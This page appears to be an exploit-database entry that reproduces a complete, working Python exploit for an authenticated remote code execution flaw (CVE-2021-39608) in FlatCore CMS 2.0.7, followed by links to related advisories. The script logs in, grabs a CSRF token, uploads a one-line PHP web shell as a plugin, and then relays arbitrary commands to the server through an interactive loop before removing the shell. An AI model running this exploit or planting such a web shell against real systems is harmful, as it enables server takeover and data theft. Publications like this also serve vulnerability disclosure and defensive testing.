Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMason Soroka-GillPACKETSTORM:164047
HistorySep 05, 2021 - 12:00 a.m.

FlatCore CMS 2.0.7 Remote Code Execution

2021-09-0500:00:00
Mason Soroka-Gill
packetstormsecurity.com
138
JSON
`# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)  
# Date: 04/10/2021  
# Exploit Author: Mason Soroka-Gill @sgizoid  
# Vendor Homepage: https://flatcore.org/  
# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz  
# Version: 2.0.7  
# Tested on: Ubuntu Server 21.04  
# CVE: CVE-2021-39608  
# References:  
# - https://github.com/flatCore/flatCore-CMS/issues/52  
  
#!/usr/bin/env python3  
  
import sys  
import requests  
from lxml import html  
from urllib.parse import urlencode  
  
if len(sys.argv) != 4:  
print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")  
exit(1)  
  
TARGET = sys.argv[1]  
USERNAME = sys.argv[2]  
PASSWORD = sys.argv[3]  
  
# attempt to log in  
resp = requests.post(f"{TARGET}/index.php?p=1",  
data={  
"login_name":f"{USERNAME}",  
"login_psw":f"{PASSWORD}",  
"login":"Anmelden"})  
  
# grab the PHP session ID  
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]  
  
# validate credentials worked  
resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons",  
headers={"Cookie":PHPSESSID})  
if resp.status_code != 200:  
print("Invalid credentials")  
exit(1)  
else:  
print("Logged in")  
  
# grab the csrf token for the script upload  
csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value  
  
# post the shell to the host  
resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",  
data={"upload_type":"plugin", "csrf_token":csrf_token}, # the csrf token  
files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")}, # the webshell  
headers={"Cookie":PHPSESSID}) # the php session id  
  
# pretend to be a shell  
while True:  
command = input("$ ")  
if command.lower() == "exit" or command.lower() == "q":  
break  
resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}")  
# verify payload succeeded  
if resp.status_code == 200:  
print(resp.text)  
else:  
print("Error: Something went wrong, maybe the shell didn't work?")  
break  
  
# delete the webshell  
resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php",  
headers={"Cookie":PHPSESSID})  
if resp.status_code == 200:  
print("Cleaned up webshell")  
  
# clean up the session  
resp = requests.get(f"{TARGET}/index.php?goto=logout",  
headers={"Cookie":PHPSESSID})  
if resp.status_code == 200:  
print("Logged out")  
  
exit(0)  
  
`

Related

cnvd 1
checkpoint_advisories 1
prion 1
osv 1
zdt 1
cve 1
exploitdb 1
cnvd
cnvd
flatCore remote code execution vulnerability
2021-08-24 00:00:00
checkpoint_advisories
checkpoint_advisories
FlatCore CMS Remote Code Execution (CVE-2021-39608)
2021-11-07 00:00:00
prion
prion
Remote code execution
2021-08-23 21:15:00
osv
osv
CVE-2021-39608
2021-08-23 21:15:10
zdt
zdt
FlatCore CMS 2.0.7 - Remote Code Execution (Authenticated) Vulnerability
2021-09-06 00:00:00
cve
cve
CVE-2021-39608
2021-08-23 21:15:00
exploitdb
exploitdb
FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
2021-09-06 00:00:00
JSON
Related for PACKETSTORM:164047
cnvd1checkpoint_advisories1prion1osv1zdt1cve1exploitdb1